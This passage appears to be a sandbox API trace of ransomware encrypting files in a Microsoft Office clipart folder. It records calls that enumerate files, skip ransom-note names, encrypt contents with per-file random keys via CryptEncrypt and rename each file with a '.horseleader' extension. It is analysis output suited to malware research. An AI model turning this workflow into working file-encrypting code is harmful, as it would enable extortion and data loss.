office\\clipart\\pub60cor\\an04326_.wmf.horseleader")) returned 1 [0253.016] GetProcessHeap () returned 0x780000 [0253.016] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.017] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x513d5e50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x10c8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04332_.WMF", cAlternateFileName="")) returned 1 [0253.017] lstrcmpiW (lpString1="AN04332_.WMF", lpString2="Windows") returned -1 [0253.017] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 67 [0253.017] StrStrIW (lpFirst="AN04332_.WMF", lpSrch=".horseleader") returned 0x0 [0253.017] lstrcmpW (lpString1="AN04332_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.017] lstrcmpW (lpString1="AN04332_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.017] lstrlenW (lpString=".testttjffg") returned 11 [0253.017] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.017] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.017] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.017] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.019] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 67 [0253.019] StrStrW (lpFirst="AN04332_.WMF", lpSrch=".txt") returned 0x0 [0253.019] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4296) returned 1 [0253.019] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x10c8, lpOverlapped=0x0) returned 1 [0253.021] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffef38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.021] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x10c8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x10c8, lpOverlapped=0x0) returned 1 [0253.021] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.022] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.022] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.022] CloseHandle (hObject=0x158) returned 1 [0253.022] GetProcessHeap () returned 0x780000 [0253.022] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.022] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF.horseleader") returned 79 [0253.022] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf.horseleader")) returned 1 [0253.023] GetProcessHeap () returned 0x780000 [0253.023] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.023] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x513d5e50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xc9c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04355_.WMF", cAlternateFileName="")) returned 1 [0253.023] lstrcmpiW (lpString1="AN04355_.WMF", lpString2="Windows") returned -1 [0253.023] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 67 [0253.024] StrStrIW (lpFirst="AN04355_.WMF", lpSrch=".horseleader") returned 0x0 [0253.024] lstrcmpW (lpString1="AN04355_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.024] lstrcmpW (lpString1="AN04355_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.024] lstrlenW (lpString=".testttjffg") returned 11 [0253.024] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.024] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.024] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.024] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.025] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 67 [0253.025] StrStrW (lpFirst="AN04355_.WMF", lpSrch=".txt") returned 0x0 [0253.025] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3228) returned 1 [0253.025] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xc9c, lpOverlapped=0x0) returned 1 [0253.027] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff364, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.027] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xc9c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xc9c, lpOverlapped=0x0) returned 1 [0253.027] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.028] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.028] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.028] CloseHandle (hObject=0x158) returned 1 [0253.028] GetProcessHeap () returned 0x780000 [0253.028] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.028] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF.horseleader") returned 79 [0253.028] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf.horseleader")) returned 1 [0253.029] GetProcessHeap () returned 0x780000 [0253.029] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.029] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x513d5e50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x12c8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04369_.WMF", cAlternateFileName="")) returned 1 [0253.029] lstrcmpiW (lpString1="AN04369_.WMF", lpString2="Windows") returned -1 [0253.029] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 67 [0253.029] StrStrIW (lpFirst="AN04369_.WMF", lpSrch=".horseleader") returned 0x0 [0253.029] lstrcmpW (lpString1="AN04369_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.029] lstrcmpW (lpString1="AN04369_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.029] lstrlenW (lpString=".testttjffg") returned 11 [0253.030] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.030] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.030] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.030] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.030] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 67 [0253.030] StrStrW (lpFirst="AN04369_.WMF", lpSrch=".txt") returned 0x0 [0253.030] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4808) returned 1 [0253.031] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x12c8, lpOverlapped=0x0) returned 1 [0253.033] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffed38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.033] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x12c8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x12c8, lpOverlapped=0x0) returned 1 [0253.034] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.034] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.034] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.034] CloseHandle (hObject=0x158) returned 1 [0253.034] GetProcessHeap () returned 0x780000 [0253.034] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.034] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF.horseleader") returned 79 [0253.034] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf.horseleader")) returned 1 [0253.036] GetProcessHeap () returned 0x780000 [0253.036] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.036] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1384, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04384_.WMF", cAlternateFileName="")) returned 1 [0253.036] lstrcmpiW (lpString1="AN04384_.WMF", lpString2="Windows") returned -1 [0253.037] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 67 [0253.037] StrStrIW (lpFirst="AN04384_.WMF", lpSrch=".horseleader") returned 0x0 [0253.037] lstrcmpW (lpString1="AN04384_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.037] lstrcmpW (lpString1="AN04384_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.037] lstrlenW (lpString=".testttjffg") returned 11 [0253.037] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.037] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.037] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.037] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.038] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 67 [0253.038] StrStrW (lpFirst="AN04384_.WMF", lpSrch=".txt") returned 0x0 [0253.038] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4996) returned 1 [0253.038] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1384, lpOverlapped=0x0) returned 1 [0253.041] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffec7c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.041] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1384, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1384, lpOverlapped=0x0) returned 1 [0253.041] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.041] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.041] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.042] CloseHandle (hObject=0x158) returned 1 [0253.042] GetProcessHeap () returned 0x780000 [0253.042] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.042] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF.horseleader") returned 79 [0253.042] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf.horseleader")) returned 1 [0253.043] GetProcessHeap () returned 0x780000 [0253.043] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.043] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x138c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04385_.WMF", cAlternateFileName="")) returned 1 [0253.043] lstrcmpiW (lpString1="AN04385_.WMF", lpString2="Windows") returned -1 [0253.043] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 67 [0253.043] StrStrIW (lpFirst="AN04385_.WMF", lpSrch=".horseleader") returned 0x0 [0253.043] lstrcmpW (lpString1="AN04385_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.043] lstrcmpW (lpString1="AN04385_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.044] lstrlenW (lpString=".testttjffg") returned 11 [0253.044] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.044] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.044] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.044] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.044] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 67 [0253.044] StrStrW (lpFirst="AN04385_.WMF", lpSrch=".txt") returned 0x0 [0253.044] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5004) returned 1 [0253.045] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x138c, lpOverlapped=0x0) returned 1 [0253.047] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffec74, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.047] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x138c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x138c, lpOverlapped=0x0) returned 1 [0253.047] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.047] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.047] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.048] CloseHandle (hObject=0x158) returned 1 [0253.048] GetProcessHeap () returned 0x780000 [0253.048] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.048] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF.horseleader") returned 79 [0253.048] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf.horseleader")) returned 1 [0253.049] GetProcessHeap () returned 0x780000 [0253.049] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.049] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfc41400, ftCreationTime.dwHighDateTime=0x1bd4c15, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcfc41400, ftLastWriteTime.dwHighDateTime=0x1bd4c15, nFileSizeHigh=0x0, nFileSizeLow=0x1cd8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BABY_01.MID", cAlternateFileName="")) returned 1 [0253.049] lstrcmpiW (lpString1="BABY_01.MID", lpString2="Windows") returned -1 [0253.049] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 66 [0253.049] StrStrIW (lpFirst="BABY_01.MID", lpSrch=".horseleader") returned 0x0 [0253.049] lstrcmpW (lpString1="BABY_01.MID", lpString2="#Decrypt#.txt") returned 1 [0253.049] lstrcmpW (lpString1="BABY_01.MID", lpString2="_uninstalling_.png") returned 1 [0253.049] lstrlenW (lpString=".testttjffg") returned 11 [0253.050] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID", lpSrch=".testttjffg") returned 0x0 [0253.050] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.050] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.050] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.050] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 66 [0253.051] StrStrW (lpFirst="BABY_01.MID", lpSrch=".txt") returned 0x0 [0253.051] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7384) returned 1 [0253.051] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 